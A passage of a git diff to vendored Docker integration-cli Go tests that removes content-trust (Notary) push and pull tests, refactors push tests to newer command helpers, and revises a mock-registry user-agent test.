tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - - // Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid. - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted pull:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - - // Snapshots last for three years. This should be expired - fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) - - runAtDifferentDate(fourYearsLater, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots")) - c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out)) - }) -} - -func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-offline-pull") - - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out)) - // Do valid trusted pull to warm cache - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - - // Try pull again with invalid notary server, should use cache - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete") - // tag the image and upload it to the private registry - _, err := buildImage(repoName, ` - FROM busybox - CMD echo trustedpulldelete - `, true) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - if out, status := dockerCmd(c, "rmi", repoName); status != 0 { - c.Fatalf("Error removing image %q\n%s", repoName, out) - } - - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - - matches := digestRegex.FindStringSubmatch(out) - c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from pull output: %s", out)) - pullDigest := matches[1] - - imageID := inspectField(c, repoName, "Id") - - imageByDigest := repoName + "@" + pullDigest - byDigestID := inspectField(c, imageByDigest, "Id") - - c.Assert(byDigestID, checker.Equals, imageID) - - // rmi of tag should also remove the digest reference - dockerCmd(c, "rmi", repoName) - - _, err = inspectFieldWithError(imageByDigest, "Id") - c.Assert(err, checker.NotNil, check.Commentf("digest reference should have been removed")) - - _, err = inspectFieldWithError(imageID, "Id") - c.Assert(err, checker.NotNil, check.Commentf("image should have been deleted")) -} - -func (s *DockerTrustSuite) TestTrustedPullReadsFromReleasesRole(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasesdelegationpulling/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - - // Push with targets first, initializing the repo - dockerCmd(c, "tag", "busybox", targetName) - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - s.assertTargetInRoles(c, repoName, "latest", "targets") - - // Try pull, check we retrieve from targets role - pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "retrieving target for targets role") - - // Now we'll create the releases role, and try pushing and pulling - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // try a pull, check that we can still pull because we can still read the - // old tag in the targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "retrieving target for targets role") - - // try a pull -a, check that it succeeds because we can still pull from the - // targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - - // Push, should sign with targets/releases - dockerCmd(c, "tag", "busybox", targetName) - pushCmd = exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases") - - // Try pull, check we retrieve from targets/releases role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(out, checker.Contains, "retrieving target for targets/releases role") - - // Create another delegation that we'll sign with - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public) - s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private) - s.notaryPublish(c, repoName) - - dockerCmd(c, "tag", "busybox", targetName) - pushCmd = exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other") - - // Try pull, check we retrieve from targets/releases role - pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(out, checker.Contains, "retrieving target for targets/releases role") -} - -func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - - // We'll create a repo first with a non-release delegation role, so that when we - // push we'll sign it into the delegation role - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public) - s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private) - s.notaryPublish(c, repoName) - - // Push should write to the delegation role, not targets - dockerCmd(c, "tag", "busybox", targetName) - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - s.assertTargetInRoles(c, repoName, "latest", "targets/other") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull - we should fail, since pull will only pull from the targets/releases - // role or the targets role - pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "No trust data for") - - // try a pull -a: we should fail since pull will only pull from the targets/releases - // role or the targets role - pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "No trusted tags for") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go index f750c12674..01ad829192 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go @@ -7,16 +7,14 @@ import ( "net/http" "net/http/httptest" "os" - "os/exec" - "path/filepath" "strings" "sync" - "time" "github.com/docker/distribution/reference" - "github.com/docker/docker/cliconfig" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) // Pushing an image to a private registry. @@ -134,13 +132,13 @@ func testPushEmptyLayer(c *check.C) { c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball")) defer freader.Close() - importCmd := exec.Command(dockerBinary, "import", "-", repoName) - importCmd.Stdin = freader - out, _, err := runCommandWithOutput(importCmd) - c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "import", "-", repoName}, + Stdin: freader, + }).Assert(c, icmd.Success) // Now verify we can push it - out, _, err = dockerCmdWithError("push", repoName) + out, _, err := dockerCmdWithError("push", repoName) c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) } @@ -157,17 +155,16 @@ func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) { func testConcurrentPush(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"push1", "push2", "push3"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s -`, repo), true) - c.Assert(err, checker.IsNil) +`, repo))) repos = append(repos, repo) } @@ -176,8 +173,8 @@ func testConcurrentPush(c *check.C) { for _, repo := range repos { go func(repo string) { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo)) - results <- err + result := icmd.RunCommand(dockerBinary, "push", repo) + results <- result.Error }(repo) } @@ -281,337 +278,6 @@ func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c c.Assert(out3, check.Equals, "hello world") } -func (s *DockerTrustSuite) TestTrustedPush(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) - - // Assert that we rotated the snapshot key to the server by checking our local keystore - contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest")) - c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files")) - // Check that we only have 1 key (targets key) - c.Assert(contents, checker.HasLen, 1) -} - -func (s *DockerTrustSuite) TestTrustedPushWithEnvPasswords(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - // Using a name that doesn't resolve to an address makes this test faster - s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server")) - c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", "--disable-content-trust", repoName) - // Using a name that doesn't resolve to an address makes this test faster - s.trustedCmdWithServer(pushCmd, "https://server.invalid") - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out)) - c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // Try pull after push - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Do a trusted push - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // Do another trusted push - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - dockerCmd(c, "rmi", repoName) - - // Try pull to ensure the double push did not break our ability to pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted pull: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust")) - -} - -func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - // Push with wrong passphrases - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321") - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets passphrase: \n%s", out)) - c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase")) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // Snapshots last for three years. This should be expired - fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) - - runAtDifferentDate(fourYearsLater, func() { - // Push with wrong passphrases - pushCmd = exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out)) - c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot")) - }) -} - -func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) - - // The timestamps expire in two weeks. Lets check three - threeWeeksLater := time.Now().Add(time.Hour * 24 * 21) - - // Should succeed because the server transparently re-signs one - runAtDifferentDate(threeWeeksLater, func() { - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp")) - }) -} - -func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) - s.notaryPublish(c, repoName) - - s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - // check to make sure that the target has been added to targets/releases and not targets - s.assertTargetInRoles(c, repoName, "latest", "targets/releases") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) - s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public) - s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public) - - // import everything except the third key - s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) - s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) - - s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public) - s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private) - - s.notaryPublish(c, repoName) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // check to make sure that the target has been added to targets/role1 and targets/role2, and - // not targets (because there are delegations) or targets/role3 (due to missing key) or - // targets/role1/subrole (due to it being a second level delegation) - s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - // pull should fail because none of these are the releases role - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z") - s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y") - s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest") - s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest") - - // import everything except the third key - s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) - s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) - s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private) - - s.notaryPublish(c, repoName) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) - c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) - - // check to make sure that the target has been added to targets/role1 and targets/role4, and - // not targets (because there are delegations) or targets/role2 (due to path restrictions) or - // targets/role3 (due to missing key) - s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role4") - s.assertTargetNotInRoles(c, repoName, "latest", "targets") - - // Try pull after push - os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) - - // pull should fail because none of these are the releases role - pullCmd := exec.Command(dockerBinary, "pull", targetName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.NotNil, check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) { - testRequires(c, NotaryHosting) - repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL) - targetName := fmt.Sprintf("%s:latest", repoName) - s.notaryInitRepo(c, repoName) - s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) - s.notaryPublish(c, repoName) - - // do not import any delegations key - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", targetName) - - pushCmd := exec.Command(dockerBinary, "push", targetName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out)) - c.Assert(out, checker.Contains, "no valid signing keys", - check.Commentf("Missing expected output on trusted push without keys")) - - s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1") -} - func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) { repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) dockerCmd(c, "tag", "busybox", repoName) @@ -675,15 +341,16 @@ func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponse } func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) { - ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4) + ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 3) defer ts.Close() s.setupRegistryWithTokenService(c, ts.URL) repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) dockerCmd(c, "tag", "busybox", repoName) out, _, err := dockerCmdWithError("push", repoName) c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Retrying") - c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") + // TODO: isolate test so that it can be guaranteed that the 503 will trigger xfer retries + //c.Assert(out, checker.Contains, "Retrying") + //c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") split := strings.Split(out, "\n") c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go index fb9a66a541..7ee3c3d1ba 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go @@ -2,9 +2,12 @@ package main import ( "fmt" + "io/ioutil" "net/http" + "os" "regexp" + "github.com/docker/docker/internal/test/registry" "github.com/go-check/check" ) @@ -46,9 +49,14 @@ func regexpCheckUA(c *check.C, ua string) { c.Assert(bMatchUpstreamUA, check.Equals, true, check.Commentf("(Upstream) Docker Client User-Agent malformed")) } -func registerUserAgentHandler(reg *testRegistry, result *string) { - reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { +// registerUserAgentHandler registers a handler for the `/v2/*` endpoint. +// Note that a 404 is returned to prevent the client to proceed. +// We are only checking if the client sent a valid User Agent string along +// with the request. +func registerUserAgentHandler(reg *registry.Mock, result *string) { + reg.RegisterHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(404) + w.Write([]byte(`{"errors":[{"code": "UNSUPPORTED","message": "this is a mock registry"}]}`)) var ua string for k, v := range r.Header { if k == "User-Agent" { @@ -61,60 +69,35 @@ func registerUserAgentHandler(reg *testRegistry, result *string) { // TestUserAgentPassThrough verifies that when an image is pulled from // a registry, the registry should see a User-Agent string of the form -// [docker engine UA] UptreamClientSTREAM-CLIENT([client UA]) +// [docker engine UA] UpstreamClientSTREAM-CLIENT([client UA]) func (s *DockerRegistrySuite) TestUserAgentPassThrough(c *check.C) { - var ( - buildUA string - pullUA string - pushUA string - loginUA string - ) - - buildReg, err := newTestRegistry(c) - c.Assert(err, check.IsNil) - registerUserAgentHandler(buildReg, &buildUA) - buildRepoName := 